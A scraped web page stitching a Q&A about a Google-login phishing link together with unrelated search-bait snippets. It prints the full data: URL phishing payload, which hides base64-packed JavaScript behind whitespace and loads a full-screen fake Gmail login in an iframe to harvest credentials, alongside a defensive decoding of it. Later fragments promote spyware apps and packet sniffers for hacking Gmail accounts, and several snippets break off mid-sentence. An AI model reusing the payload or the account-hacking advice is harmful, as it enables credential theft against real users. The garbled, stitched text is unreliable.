Is this a Google account hack?

google account recovery
how to find out who hacked my gmail account
facebook account hacked
how to hack google
someone trying to recover my google account
google pay account hacked
gmail hacked 2020
google account help

I received an email from a colleague with an attached file that appeared to be on Google Drive, once clicked it led to the following URL, which recreates the Google account login page in order to steal passwords:

data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gY307aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMtLSl7ZFtjXT1rW2NdfHxjfWs9W2Z1bmN0aW9uKGUpe3JldHVybiBkW2VdfV07ZT1mdW5jdGlvbigpe3JldHVybidcXHcrJ307Yz0xfTt3aGlsZShjLS0pe2lmKGtbY10pe3A9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pfX1yZXR1cm4gcH0oJzMuMi4xNj0iMTUgMTQgMTMgMTcgMTgiOzIxeygyMCgpezE5IDE9My4yLjEyKFwnMVwnKTsxLjEwPVwnNy84LTZcJzsxLjExPVwnOSA2XCc7MS4yMj1cJ1wnOzIuMzEoXCczNFwnKVswXS4yMygxKX0oKSl9MzMoMzUpe30zLjIuMzYuMzc9Ijw0IDM5PVxcIjM4Oi8vMzIuMjYvMjUtMjQvXFwiIDI3PVxcIjI4OiAwOzMwOiA1JTsyOTo1JVxcIj48LzQ+IjsnLDEwLDQwLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWZyYW1lfDEwMHxpY29ufGltYWdlfHh8c2hvcnRjdXR8dHlwZXxyZWx8Y3JlYXRlRWxlbWVudHxiZWVufGhhdmV8WW91fHRpdGxlfFNpZ25lZHxvdXR8dmFyfGZ1bmN0aW9ufHRyeXxocmVmfGFwcGVuZENoaWxkfGNvbnRlbnR8d3B8Y2x1YnxzdHlsZXxib3JkZXJ8aGVpZ2h0fHdpZHRofGdldEVsZW1lbnRzQnlUYWdOYW1lfGJsdWV2b2ljZXBnaHxjYXRjaHxoZWFkfGV8Ym9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E

From the script is there any way of identifying where the information is being sent, had I put in my email address and password?

Let's break down the attack as far as we can :

it's a url, starting off with the basic gmail login link, which sets a few request variables to automatically login if possible.

data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue

This is followed by a large amount of empty spaces, intended to hide the malicious payload from view in the browser address bar.

%20%20%20%20%20%20%20%20%20%20%20% (etc)

now follows the payload for the victim. it's base64 encoded.

when we decode it, it looks like this :

eval(function (p, a, c, k, e, d)
{
    e = function (c)
    {
        return c
    };
    if (!''.replace(/^/, String))
    {
        while (c--)
        {
            d[c] = k[c] || c
        }
        k = [function (e)
            {
                return d[e]
            }
        ];
        e = function ()
        {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
    {
        if (k[c])
        {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}
    ('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
    ))

this, is evil, obfuscated javascript. do not execute it.

martinstoeckli's answer contains the expanded version of this script.

it sets the title of your current tab to mimick the 'you have been signed out' page of gMail, and alters the page, adding a screen-filling iframe with no borders.

The iFrame points at (what appears to be) a compromised wordpress site, that contains a faked gmail login page. Upon entering credentials into the fake page hosted on bluevoicepgh.club (someone might want to notify these people that their wordpress website is probably compromised), you are then redirected to the gmail page that had silently logged you in in the background. this happens regardless of whether the credentials you entered into the fake login page were correct or not.

If you had indeed entered valid credentials into that page, there is no telling where it would have gone unless you could look at the script behind it.

Keep in mind, that (thankfully) in its current form, the attack won't work properly since google's login page uses https (and enforces use of https). As chrome reminds us when the script is executed :

Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.

How do I find out who is hacking my account?, Julie Mccormick-Saathoff. Google can't help with money return, and you will not be able to find details of the hacker. You need to properly  OK- when a Google Account is hacked (not just accessed by someone on a shared device or because there is a virus on the device being used) the security system is triggered and an alert is sent to the owner's primary email and/or recovery email etc.

Accounts hack - Google Account Community, He has added Gmail account to his device. Sadly, the truth was it was my Google Pay account. utchuwas@gmail.com (hacked account). Google Account Is Hacked There may not be any comprehensive methods to tell if your Google account is hacked. You may receive a mail from Google talking about suspicious activities from one of your

The best way to figure it out is, when it prompts you to enter your credentials, check in which domain you are actually in. If it is google domain then its ok, if not then it's something related to Phishing.

Here you should be very careful in checking the domain, the attackers play a trick, if the domain is google they create very similar something like gooogle or geogle something. So Carefully check the domain.

My Google account hacked by someone Hacker change, when i trying to forget password showing this message to me. You're trying to sign in on a device Google doesn't recognize, and we don't have  Part 2: How to Hack Gmail Account Password Online Free. If you’re wondering how to hack a Gmail account, consider trying the Spyzie app too. Like Cocospy, this app is also affordable but does not have very strong reviews. Nevertheless, it is a powerful app for Gmail hack features. Spyzie will allow you to hack the Gmail account password quickly.

Is your Gmail hacked?, Account recovery page and follow the steps to recover your account. But secure software by Google keeps their private data safe, but is it possible for an ordinary person to hack it? The answer is YES because any secured system can be hacked. It just requires a lot of time and patience. In this guide, you will find some secrets about how to hack a Gmail account without them knowing.

How hard is it to hack Google?, if you have better understanding of vulnerabilities, web applications and have quite good experience in web application penetration testing. there are many people who report them vulnerabilities frequently. Use the search bar in the password manager to search for “google.” Then, look for “accounts.google.com” to find the Gmail address. Select the password, then click the “Show” or the “Show Password” button. After you copy down the password, type it into your Gmail login page. If you have two-factor authentication activated, you’ll also need the code sent to your mobile phone to access the account. To learn how to use a Packet Sniffer to hack into your Gmail account, keep reading!

Has Google ever been hacked?, (born August 6, 1963) is an American computer security consultant, author, and convicted hacker, best known for his high-profile 1995 arrest and five years in prison for various computer and communications-related crimes. Gmail Hack Tool Download Free – Hack Gmail Account Trick. Online hack gmail account software and easy to use trick. Well, There are lot of useless gmail account hacking tool are available. Which claim successful results but in reality they are promoting some useless hacking software.

Comments
  • Just for completeness the decoded script part: pastebin.com/0ZK3s2L1
  • For those who are wondering after they pasted it to their browser. Its safe now :). The domain is closed and it will not work.